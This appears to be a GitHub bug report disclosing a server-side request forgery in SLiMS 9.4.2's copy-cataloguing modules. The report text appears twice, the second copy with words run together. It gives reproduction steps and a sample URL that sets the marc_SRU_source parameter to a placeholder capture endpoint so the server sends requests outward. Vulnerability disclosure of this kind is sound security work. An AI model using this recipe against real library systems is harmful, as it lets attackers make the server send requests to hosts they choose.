The bug
A Server Side Request Forgery exists in admin/modules/bibliography/marcsru.php and admin/modules/bibliography/z3950sru.php due to the class in lib/marc/XMLParser.inc.php
Reproduce
Steps to reproduce the behavior:
Go to http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/index.php?mod=bibliography then go to copy cataloguing
choose between marc sru or 23950sru
type in something what you want in the search bar
set burpsuite intercept on
change the z3950_SRU_source or marc_SRU_source parameter value to some url that grab the traffic
forward the request
or just visit http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/modules/bibliography/marcsru.php?keywords=aaaaaaaa&index=0&marc_SRU_source=URL_ENCODED_ENDPOINT_THAT_CAPTURE_HTTP_LIKE_HOOKBIN
Screenshots
Normal requests
Tampered and SSRF trigger(netcat)
Tampered and SSRF trigger(toptal.com)
Versions
OS: MacOS Mojave 10.14.6
Browser: Google Chrome | 103.0.5060.134 (Official Build) (x86_64)
Slims Version: slims9_bulian-9.4.2
The text was updated successfully, but these errors were encountered:
The bug
A Server Side Request Forgery exists in
admin/modules/bibliography/marcsru.phpandadmin/modules/bibliography/z3950sru.phpdue to the class inlib/marc/XMLParser.inc.phpReproduce
Steps to reproduce the behavior:
http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/index.php?mod=bibliographythen go to copy cataloguingz3950_SRU_sourceormarc_SRU_sourceparameter value to some url that grab the traffichttp://127.0.0.1:8008/slims9_bulian-9.4.2/admin/modules/bibliography/marcsru.php?keywords=aaaaaaaa&index=0&marc_SRU_source=URL_ENCODED_ENDPOINT_THAT_CAPTURE_HTTP_LIKE_HOOKBINScreenshots
Normal requests
Tampered and SSRF trigger(netcat)
Tampered and SSRF trigger(toptal.com)
Versions
The text was updated successfully, but these errors were encountered: